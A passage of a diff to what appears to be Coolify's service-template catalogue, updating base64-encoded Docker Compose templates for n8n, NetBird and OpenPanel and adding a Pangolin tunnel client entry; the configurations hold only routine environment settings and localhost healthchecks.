OR1NfRklMRV9QRVJNSVNTSU9OUz0ke044Tl9FTkZPUkNFX1NFVFRJTkdTX0ZJTEVfUEVSTUlTU0lPTlM6LXRydWV9JwogICAgICAtICdOOE5fUFJPWFlfSE9QUz0ke044Tl9QUk9YWV9IT1BTOi0xfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ244bi1kYXRhOi9ob21lL25vZGUvLm44bicKICAgIGRlcGVuZHNfb246CiAgICAgIHBvc3RncmVzcWw6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtcU8tIGh0dHA6Ly8xMjcuMC4wLjE6NTY3OC8nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICBwb3N0Z3Jlc3FsOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxNi1hbHBpbmUnCiAgICB2b2x1bWVzOgogICAgICAtICdwb3N0Z3Jlc3FsLWRhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gUE9TVEdSRVNfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gUE9TVEdSRVNfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotbjhufScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAK", + "compose": "c2VydmljZXM6CiAgbjhuOgogICAgaW1hZ2U6ICdkb2NrZXIubjhuLmlvL244bmlvL244bjoxLjExOS4yJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX044Tl81Njc4CiAgICAgIC0gJ044Tl9FRElUT1JfQkFTRV9VUkw9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnV0VCSE9PS19VUkw9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnTjhOX0hPU1Q9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnR0VORVJJQ19USU1FWk9ORT0ke0dFTkVSSUNfVElNRVpPTkU6LUV1cm9wZS9CZXJsaW59JwogICAgICAtICdUWj0ke1RaOi1FdXJvcGUvQmVybGlufScKICAgICAgLSBEQl9UWVBFPXBvc3RncmVzZGIKICAgICAgLSAnREJfUE9TVEdSRVNEQl9EQVRBQkFTRT0ke1BPU1RHUkVTX0RCOi1uOG59JwogICAgICAtIERCX1BPU1RHUkVTREJfSE9TVD1wb3N0Z3Jlc3FsCiAgICAgIC0gREJfUE9TVEdSRVNEQl9QT1JUPTU0MzIKICAgICAgLSBEQl9QT1NUR1JFU0RCX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIERCX1BPU1RHUkVTREJfU0NIRU1BPXB1YmxpYwogICAgICAtIERCX1BPU1RHUkVTREJfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSAnTjhOX1JVTk5FUlNfRU5BQkxFRD0ke044Tl9SVU5ORVJTX0VOQUJMRUQ6LXRydWV9JwogICAgICAtICdOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFPSR7TjhOX0JMT0NLX0VOVl9BQ0NFU1NfSU5fTk9ERTotdHJ1ZX0nCiAgICAgIC0gJ044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M9JHtOOE5fR0lUX05PREVfRElTQUJMRV9CQVJFX1JFUE9TOi10cnVlfScKICAgICAgLSAnTjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUz0ke044Tl9FTkZPUkNFX1NFVFRJTkdTX0ZJTEVfUEVSTUlTU0lPTlM6LXRydWV9JwogICAgICAtICdOOE5fUFJPWFlfSE9QUz0ke044Tl9QUk9YWV9IT1BTOi0xfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ244bi1kYXRhOi9ob21lL25vZGUvLm44bicKICAgIGRlcGVuZHNfb246CiAgICAgIHBvc3RncmVzcWw6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtcU8tIGh0dHA6Ly8xMjcuMC4wLjE6NTY3OC8nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICBwb3N0Z3Jlc3FsOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxNi1hbHBpbmUnCiAgICB2b2x1bWVzOgogICAgICAtICdwb3N0Z3Jlc3FsLWRhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gUE9TVEdSRVNfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gUE9TVEdSRVNfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotbjhufScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAK", "tags": [ "n8n", "workflow", @@ -2642,7 +2642,7 @@ "n8n": { "documentation": "https://n8n.io?utm_source=coolify.io", "slogan": "n8n is an extendable workflow automation tool.", - "compose": "c2VydmljZXM6CiAgbjhuOgogICAgaW1hZ2U6ICdkb2NrZXIubjhuLmlvL244bmlvL244bjoxLjExNC40JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX044Tl81Njc4CiAgICAgIC0gJ044Tl9FRElUT1JfQkFTRV9VUkw9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnV0VCSE9PS19VUkw9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnTjhOX0hPU1Q9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnR0VORVJJQ19USU1FWk9ORT0ke0dFTkVSSUNfVElNRVpPTkU6LUV1cm9wZS9CZXJsaW59JwogICAgICAtICdUWj0ke1RaOi1FdXJvcGUvQmVybGlufScKICAgICAgLSAnREJfU1FMSVRFX1BPT0xfU0laRT0ke0RCX1NRTElURV9QT09MX1NJWkU6LTN9JwogICAgICAtICdOOE5fUlVOTkVSU19FTkFCTEVEPSR7TjhOX1JVTk5FUlNfRU5BQkxFRDotdHJ1ZX0nCiAgICAgIC0gJ044Tl9CTE9DS19FTlZfQUNDRVNTX0lOX05PREU9JHtOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFOi10cnVlfScKICAgICAgLSAnTjhOX0dJVF9OT0RFX0RJU0FCTEVfQkFSRV9SRVBPUz0ke044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M6LXRydWV9JwogICAgICAtICdOOE5fRU5GT1JDRV9TRVRUSU5HU19GSUxFX1BFUk1JU1NJT05TPSR7TjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUzotdHJ1ZX0nCiAgICAgIC0gJ044Tl9QUk9YWV9IT1BTPSR7TjhOX1BST1hZX0hPUFM6LTF9JwogICAgdm9sdW1lczoKICAgICAgLSAnbjhuLWRhdGE6L2hvbWUvbm9kZS8ubjhuJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo1Njc4LycKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=", + "compose": "c2VydmljZXM6CiAgbjhuOgogICAgaW1hZ2U6ICdkb2NrZXIubjhuLmlvL244bmlvL244bjoxLjExOS4yJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX044Tl81Njc4CiAgICAgIC0gJ044Tl9FRElUT1JfQkFTRV9VUkw9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnV0VCSE9PS19VUkw9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnTjhOX0hPU1Q9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnR0VORVJJQ19USU1FWk9ORT0ke0dFTkVSSUNfVElNRVpPTkU6LUV1cm9wZS9CZXJsaW59JwogICAgICAtICdUWj0ke1RaOi1FdXJvcGUvQmVybGlufScKICAgICAgLSAnREJfU1FMSVRFX1BPT0xfU0laRT0ke0RCX1NRTElURV9QT09MX1NJWkU6LTN9JwogICAgICAtICdOOE5fUlVOTkVSU19FTkFCTEVEPSR7TjhOX1JVTk5FUlNfRU5BQkxFRDotdHJ1ZX0nCiAgICAgIC0gJ044Tl9CTE9DS19FTlZfQUNDRVNTX0lOX05PREU9JHtOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFOi10cnVlfScKICAgICAgLSAnTjhOX0dJVF9OT0RFX0RJU0FCTEVfQkFSRV9SRVBPUz0ke044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M6LXRydWV9JwogICAgICAtICdOOE5fRU5GT1JDRV9TRVRUSU5HU19GSUxFX1BFUk1JU1NJT05TPSR7TjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUzotdHJ1ZX0nCiAgICAgIC0gJ044Tl9QUk9YWV9IT1BTPSR7TjhOX1BST1hZX0hPUFM6LTF9JwogICAgdm9sdW1lczoKICAgICAgLSAnbjhuLWRhdGE6L2hvbWUvbm9kZS8ubjhuJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo1Njc4LycKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=", "tags": [ "n8n", "workflow", @@ -2689,7 +2689,7 @@ "netbird-client": { "documentation": "https://docs.netbird.io/how-to/examples#net-bird-client-in-docker?utm_source=coolify.io", "slogan": "Connect your devices into a secure WireGuard\u00ae-based overlay network with SSO, MFA and granular access controls.", - "compose": "c2VydmljZXM6CiAgbmV0YmlyZC1jbGllbnQ6CiAgICBpbWFnZTogJ25ldGJpcmRpby9uZXRiaXJkOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtICdOQl9TRVRVUF9LRVk9JHtOQl9TRVRVUF9LRVl9JwogICAgICAtICdOQl9FTkFCTEVfUk9TRU5QQVNTPSR7TkJfRU5BQkxFX1JPU0VOUEFTUzotZmFsc2V9JwogICAgICAtICdOQl9FTkFCTEVfRVhQRVJJTUVOVEFMX0xBWllfQ09OTj0ke05CX0VOQUJMRV9FWFBFUklNRU5UQUxfTEFaWV9DT05OOi1mYWxzZX0nCiAgICB2b2x1bWVzOgogICAgICAtICduZXRiaXJkLWNsaWVudDovZXRjL25ldGJpcmQnCiAgICBjYXBfYWRkOgogICAgICAtIE5FVF9BRE1JTgogICAgICAtIFNZU19BRE1JTgogICAgICAtIFNZU19SRVNPVVJDRQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIG5ldGJpcmQKICAgICAgICAtIHZlcnNpb24KICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=", + "compose": "c2VydmljZXM6CiAgbmV0YmlyZC1jbGllbnQ6CiAgICBpbWFnZTogJ25ldGJpcmRpby9uZXRiaXJkOmxhdGVzdCcKICAgIG5ldHdvcmtfbW9kZTogaG9zdAogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ05CX1NFVFVQX0tFWT0ke05CX1NFVFVQX0tFWX0nCiAgICAgIC0gJ05CX0VOQUJMRV9ST1NFTlBBU1M9JHtOQl9FTkFCTEVfUk9TRU5QQVNTOi1mYWxzZX0nCiAgICAgIC0gJ05CX0VOQUJMRV9FWFBFUklNRU5UQUxfTEFaWV9DT05OPSR7TkJfRU5BQkxFX0VYUEVSSU1FTlRBTF9MQVpZX0NPTk46LWZhbHNlfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ25ldGJpcmQtY2xpZW50Oi9ldGMvbmV0YmlyZCcKICAgIGNhcF9hZGQ6CiAgICAgIC0gTkVUX0FETUlOCiAgICAgIC0gU1lTX0FETUlOCiAgICAgIC0gU1lTX1JFU09VUkNFCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gbmV0YmlyZAogICAgICAgIC0gdmVyc2lvbgogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCg==", "tags": [ "wireguard", "mesh-networks", @@ -2717,6 +2717,20 @@ "minversion": "0.0.0", "port": "3000" }, + "newt-pangolin": { + "documentation": "https://docs.digpangolin.com/manage/sites/install-site?utm_source=coolify.io", + "slogan": "Pangolin tunnels your services to the internet so you can access anything from anywhere.", + "compose": "c2VydmljZXM6CiAgbmV3dDoKICAgIGltYWdlOiAnZm9zcmwvbmV3dDpsYXRlc3QnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUEFOR09MSU5fRU5EUE9JTlQ9JHtQQU5HT0xJTl9FTkRQT0lOVDotaHR0cHM6Ly9wYW5nb2xpbi5kb21haW4udGxkfScKICAgICAgLSAnTkVXVF9JRD0ke05FV1RfSUQ6P30nCiAgICAgIC0gJ05FV1RfU0VDUkVUPSR7TkVXVF9TRUNSRVQ6P30nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gbmV3dAogICAgICAgIC0gJy0tdmVyc2lvbicKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=", + "tags": [ + "wireguard", + "reverse-proxy", + "zero-trust-network-access", + "open source" + ], + "category": null, + "logo": "svgs/pangolin-logo.png", + "minversion": "0.0.0" + }, "next-image-transformation": { "documentation": "https://github.com/coollabsio/next-image-transformation?utm_source=coolify.io", "slogan": "Drop-in replacement for Vercel's Nextjs image optimization service.", @@ -3039,7 +3053,7 @@ "openpanel": { "documentation": "https://openpanel.dev/docs?utm_source=coolify.io", "slogan": "Open source alternative to Mixpanel and Plausible for product analytics", - "compose": "c2VydmljZXM6CiAgb3BlbnBhbmVsLWRhc2hib2FyZDoKICAgIGltYWdlOiAnbGluZGVzdmFyZC9vcGVucGFuZWwtZGFzaGJvYXJkOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtIE5PREVfRU5WPXByb2R1Y3Rpb24KICAgICAgLSBORVhUX1BVQkxJQ19TRUxGX0hPU1RFRD10cnVlCiAgICAgIC0gU0VSVklDRV9GUUROX09QREFTSEJPQVJEXzMwMDAKICAgICAgLSAnTkVYVF9QVUJMSUNfQVBJX1VSTD0ke1NFUlZJQ0VfRlFETl9PUEFQSX0nCiAgICAgIC0gJ05FWFRfUFVCTElDX0RBU0hCT0FSRF9VUkw9JHtTRVJWSUNFX0ZRRE5fT1BEQVNIQk9BUkR9JwogICAgICAtICdEQVRBQkFTRV9VUkw9cG9zdGdyZXM6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7T1BFTlBBTkVMX1BPU1RHUkVTX0RCOi1vcGVucGFuZWwtZGJ9P3NjaGVtYT1wdWJsaWMnCiAgICAgIC0gJ1JFRElTX1VSTD1yZWRpczovL2RlZmF1bHQ6JHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfUByZWRpczo2Mzc5JwogICAgICAtICdDTElDS0hPVVNFX1VSTD1odHRwOi8vY2xpY2tob3VzZTo4MTIzL29wZW5wYW5lbCcKICAgIGRlcGVuZHNfb246CiAgICAgIG9wZW5wYW5lbC1hcGk6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgb3BlbnBhbmVsLXdvcmtlcjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBjbGlja2hvdXNlOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ2N1cmwgLWYgaHR0cDovL2xvY2FsaG9zdDozMDAwL2FwaS9oZWFsdGhjaGVjayB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQogICAgICBzdGFydF9wZXJpb2Q6IDE1cwogIG9wZW5wYW5lbC1hcGk6CiAgICBpbWFnZTogJ2xpbmRlc3ZhcmQvb3BlbnBhbmVsLWFwaTpsYXRlc3QnCiAgICBjb21tYW5kOiAic2ggLWMgXCJcbiAgZWNobyAnUnVubmluZyBtaWdyYXRpb25zLi4uJ1xuICBDST10cnVlIHBucG0gLXIgcnVuIG1pZ3JhdGU6ZGVwbG95XG5cbiAgcG5wbSBzdGFydFxuXCJcbiIKICAgIGVudmlyb25tZW50OgogICAgICAtIE5PREVfRU5WPXByb2R1Y3Rpb24KICAgICAgLSBORVhUX1BVQkxJQ19TRUxGX0hPU1RFRD10cnVlCiAgICAgIC0gU0VSVklDRV9GUUROX09QQVBJCiAgICAgIC0gJ05FWFRfUFVCTElDX0FQSV9VUkw9JHtTRVJWSUNFX0ZRRE5fT1BBUEl9JwogICAgICAtICdORVhUX1BVQkxJQ19EQVNIQk9BUkRfVVJMPSR7U0VSVklDRV9GUUROX09QREFTSEJPQVJEfScKICAgICAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke09QRU5QQU5FTF9QT1NUR1JFU19EQjotb3BlbnBhbmVsLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtICdEQVRBQkFTRV9VUkxfRElSRUNUPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke09QRU5QQU5FTF9QT1NUR1JFU19EQjotb3BlbnBhbmVsLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtICdSRURJU19VUkw9cmVkaXM6Ly9kZWZhdWx0OiR7U0VSVklDRV9QQVNTV09SRF9SRURJU31AcmVkaXM6NjM3OScKICAgICAgLSAnQ0xJQ0tIT1VTRV9VUkw9aHR0cDovL2NsaWNraG91c2U6ODEyMy9vcGVucGFuZWwnCiAgICAgIC0gJ0NPT0tJRV9TRUNSRVQ9JHtTRVJWSUNFX0JBU0U2NF9DT09LSUVTRUNSRVR9JwogICAgICAtICdBTExPV19SRUdJU1RSQVRJT049JHtPUEVOUEFORUxfQUxMT1dfUkVHSVNUUkFUSU9OOi1mYWxzZX0nCiAgICAgIC0gJ0FMTE9XX0lOVklUQVRJT049JHtPUEVOUEFORUxfQUxMT1dfSU5WSVRBVElPTjotZmFsc2V9JwogICAgICAtICdFTUFJTF9TRU5ERVI9JHtPUEVOUEFORUxfRU1BSUxfU0VOREVSfScKICAgICAgLSAnUkVTRU5EX0FQSV9LRVk9JHtSRVNFTkRfQVBJX0tFWX0nCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBjbGlja2hvdXNlOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ2N1cmwgLWYgaHR0cDovL2xvY2FsaG9zdDozMDAwL2hlYWx0aGNoZWNrIHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1CiAgb3BlbnBhbmVsLXdvcmtlcjoKICAgIGltYWdlOiAnbGluZGVzdmFyZC9vcGVucGFuZWwtd29ya2VyOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtIE5PREVfRU5WPXByb2R1Y3Rpb24KICAgICAgLSBORVhUX1BVQkxJQ19TRUxGX0hPU1RFRD10cnVlCiAgICAgIC0gU0VSVklDRV9GUUROX09QQlVMTEJPQVJECiAgICAgIC0gJ05FWFRfUFVCTElDX0FQSV9VUkw9JHtTRVJWSUNFX0ZRRE5fT1BBUEl9JwogICAgICAtICdEQVRBQkFTRV9VUkw9cG9zdGdyZXM6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7T1BFTlBBTkVMX1BPU1RHUkVTX0RCOi1vcGVucGFuZWwtZGJ9P3NjaGVtYT1wdWJsaWMnCiAgICAgIC0gJ0RBVEFCQVNFX1VSTF9ESVJFQ1Q9cG9zdGdyZXM6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7T1BFTlBBTkVMX1BPU1RHUkVTX0RCOi1vcGVucGFuZWwtZGJ9P3NjaGVtYT1wdWJsaWMnCiAgICAgIC0gJ1JFRElTX1VSTD1yZWRpczovL2RlZmF1bHQ6JHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfUByZWRpczo2Mzc5JwogICAgICAtICdDTElDS0hPVVNFX1VSTD1odHRwOi8vY2xpY2tob3VzZTo4MTIzL29wZW5wYW5lbCcKICAgIGRlcGVuZHNfb246CiAgICAgIG9wZW5wYW5lbC1hcGk6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcG9zdGdyZXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgY2xpY2tob3VzZToKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdjdXJsIC1mIGh0dHA6Ly9sb2NhbGhvc3Q6MzAwMC9oZWFsdGhjaGVjayB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQogICAgICBzdGFydF9wZXJpb2Q6IDVzCiAgcG9zdGdyZXM6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE2LWFscGluZScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ29wZW5wYW5lbF9wb3N0Z3Jlc19kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGVudmlyb25tZW50OgogICAgICAtICdQT1NUR1JFU19EQj0ke09QRU5QQU5FTF9QT1NUR1JFU19EQjotb3BlbnBhbmVsLWRifScKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU30nCiAgICAgIC0gJ1BPU1RHUkVTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU30nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BnX2lzcmVhZHkgLVUgJCR7UE9TVEdSRVNfVVNFUn0gLWQgJCR7UE9TVEdSRVNfREJ9JwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDUKICByZWRpczoKICAgIGltYWdlOiAncmVkaXM6Ny40LWFscGluZScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ29wZW5wYW5lbF9yZWRpc19kYXRhOi9kYXRhJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1JFRElTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9SRURJU30nCiAgICBjb21tYW5kOiAncmVkaXMtc2VydmVyIC0tcmVxdWlyZXBhc3MgJHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfSAtLW1heG1lbW9yeS1wb2xpY3kgbm9ldmljdGlvbicKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSByZWRpcy1jbGkKICAgICAgICAtICctYScKICAgICAgICAtICcke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogICAgICAgIC0gcGluZwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDUKICBjbGlja2hvdXNlOgogICAgaW1hZ2U6ICdjbGlja2hvdXNlL2NsaWNraG91c2Utc2VydmVyOjI0LjMuMi1hbHBpbmUnCiAgICB2b2x1bWVzOgogICAgICAtICdvcGVucGFuZWxfY2xpY2tob3VzZV9kYXRhOi92YXIvbGliL2NsaWNraG91c2UnCiAgICAgIC0gJ29wZW5wYW5lbF9jbGlja2hvdXNlX2xvZ3M6L3Zhci9sb2cvY2xpY2tob3VzZS1zZXJ2ZXInCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2NsaWNraG91c2UtY29uZmlnLnhtbAogICAgICAgIHRhcmdldDogL2V0Yy9jbGlja2hvdXNlLXNlcnZlci9jb25maWcuZC9vcC1jb25maWcueG1sCiAgICAgICAgcmVhZF9vbmx5OiB0cnVlCiAgICAgICAgY29udGVudDogIjxjbGlja2hvdXNlPlxuICAgIDxsb2dnZXI+XG4gICAgICAgIDxsZXZlbD53YXJuaW5nPC9sZXZlbD5cbiAgICAgICAgPGNvbnNvbGU+dHJ1ZTwvY29uc29sZT5cbiAgICA8L2xvZ2dlcj5cbiAgICA8a2VlcF9hbGl2ZV90aW1lb3V0PjEwPC9rZWVwX2FsaXZlX3RpbWVvdXQ+XG4gICAgPCEtLSBTdG9wIGFsbCB0aGUgdW5uZWNlc3NhcnkgbG9nZ2luZyAtLT5cbiAgICA8cXVlcnlfdGhyZWFkX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPHF1ZXJ5X2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPHRleHRfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8dHJhY2VfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8bWV0cmljX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPGFzeW5jaHJvbm91c19tZXRyaWNfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8c2Vzc2lvbl9sb2cgcmVtb3ZlPVwicmVtb3ZlXCIvPlxuICAgIDxwYXJ0X2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPGxpc3Rlbl9ob3N0PjAuMC4wLjA8L2xpc3Rlbl9ob3N0PlxuICAgIDxpbnRlcnNlcnZlcl9saXN0ZW5faG9zdD4wLjAuMC4wPC9pbnRlcnNlcnZlcl9saXN0ZW5faG9zdD5cbiAgICA8aW50ZXJzZXJ2ZXJfaHR0cF9ob3N0Pm9wY2g8L2ludGVyc2VydmVyX2h0dHBfaG9zdD5cbiAgICA8IS0tIERpc2FibGUgY2dyb3VwIG1lbW9yeSBvYnNlcnZlciAtLT5cbiAgICA8Y2dyb3Vwc19tZW1vcnlfdXNhZ2Vfb2JzZXJ2ZXJfd2FpdF90aW1lPjA8L2Nncm91cHNfbWVtb3J5X3VzYW